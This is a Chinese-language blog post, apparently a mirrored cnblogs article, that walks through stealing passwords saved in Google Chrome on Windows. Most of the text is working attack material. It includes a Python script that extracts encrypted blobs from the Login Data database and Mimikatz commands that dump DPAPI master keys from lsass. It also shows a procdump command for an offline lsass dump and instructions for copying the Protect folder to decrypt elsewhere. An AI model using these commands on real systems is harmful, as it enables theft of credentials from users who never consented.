zoukankan      html  css  js  c++  java

  • 谷歌浏览器保存密码的读取

    通过Mimikatz读取谷歌浏览器保存密码:

    1、查看是否存在密文,使用python读取数据库文件并提取出密文

    dir /a %LocalAppData%GoogleChromeUser DataDefaultLogin Data

    使用python脚本读取Login Data并保存到文件中,代码如下:

    from os import getenv
import sqlite3
import binascii
conn = sqlite3.connect("Login Data")
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
    print (binascii.b2a_hex(result[2]))
    f = open('test.txt', 'wb')
    f.write(result[2])
    f.close()

    脚本执行后,提取Login Data中保存的密文,保存为test.txt

    2、获得该密文对应的Master Key File

    dpapi::blob /in:test.txt

    获得对应guidMasterkey为{a111b0f6-b4d7-40c8-b536-672a8288b958}

    即Master Key file的路径为%APPDATA%MicrosoftProtect\%SID%a111b0f6-b4d7-40c8-b536-672a8288b958

    3、从lsass进程提取出Master Key

    privilege::debug
sekurlsa::dpapi

    提取出Master Key为666638cbaea3b7cf1dc55688f939e50ea1002cded954a1d17d5fe0fbc90b7dd34677ac148af1f32caf828fdf7234bafbe14b39791b3d7e587176576d39c3fa70

    如果这里不能直接用mimikatz在线读的话,那么可以通过转储procdump.exe -accepteula -ma lsass.exe lsass.dmp,然后再本地进行提取Master Key

    注意的:mimikatz从lsass进程提取出Master Key后,会自动将Master Key加入系统缓存

    4、拿到Master Key,那么就可以直接对当前存储在text.txt中的密文进行解密了

    dpapi::blob /in test.txt

    通过ChromePass读取谷歌浏览器保存密码:

    前提条件:已知电脑账号密码

    解密过程:我们需要得到的两个文件:

    1、Login Data数据库文件:目录位置%localappdata%googlechromeUSERDA~1default

    2、%USERPROFILE%AppDataRoamingMicrosoft把其中的Protect文件夹下载过来

    参考文章:

    1、https://3gstudent.github.io/3gstudent.github.io/渗透技巧-利用Masterkey离线导出Chrome浏览器中保存的密码/

    2、https://www.t00ls.net/viewthread.php?tid=52330&highlight=chrome
  • 相关阅读:
    Oracle存储过程和自定义函数笔记
    怎样将一个Long类型的数据转换成字节数组
    Java集合框架整理
    有了这些,java IO就不愁了
    java生成Excel文件,下载
    ajax使用
    java transient关键字
    Mysql乐观锁与悲观锁
    Spring(六)Spring执行流程
    Spring(五)AOP
  • 原文地址:https://www.cnblogs.com/zpchcbd/p/11942502.html
Copyright © 2011-2022 走看看